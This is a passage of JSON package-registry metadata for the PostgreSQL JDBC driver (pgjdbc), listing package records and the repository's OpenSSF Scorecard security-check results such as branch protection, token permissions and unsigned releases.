.github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-03-15T13:14:19.924Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":20.77325831673157,"dependent_packages_count":32.98481314258827,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.879035729659922},"purl":"pkg:maven/com.alibaba.hologres/postgresql-holo","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/com.alibaba.hologres:postgresql-holo","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/com.alibaba.hologres:postgresql-holo","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/com.alibaba.hologres:postgresql-holo/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/com.alibaba.hologres:postgresql-holo/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":608482,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":10636251,"name":"github.com/pgjdbc/pgjdbc","ecosystem":"go","description":null,"homepage":null,"licenses":"bsd-2-clause","normalized_licenses":["BSD-2-Clause"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":null,"versions_count":4,"first_release_published_at":"2020-05-27T12:29:59.000Z","latest_release_published_at":"2020-03-04T20:27:35.000Z","latest_release_number":"v42.3.0-rc5+incompatible","last_synced_at":"2026-06-17T08:00:41.285Z","created_at":"2024-07-11T05:53:43.633Z","updated_at":"2026-06-17T08:00:41.285Z","registry_url":"https://pkg.go.dev/github.com/pgjdbc/pgjdbc","install_command":"go get github.com/pgjdbc/pgjdbc","documentation_url":"https://pkg.go.dev/github.com/pgjdbc/pgjdbc#section-documentation","metadata":{},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while 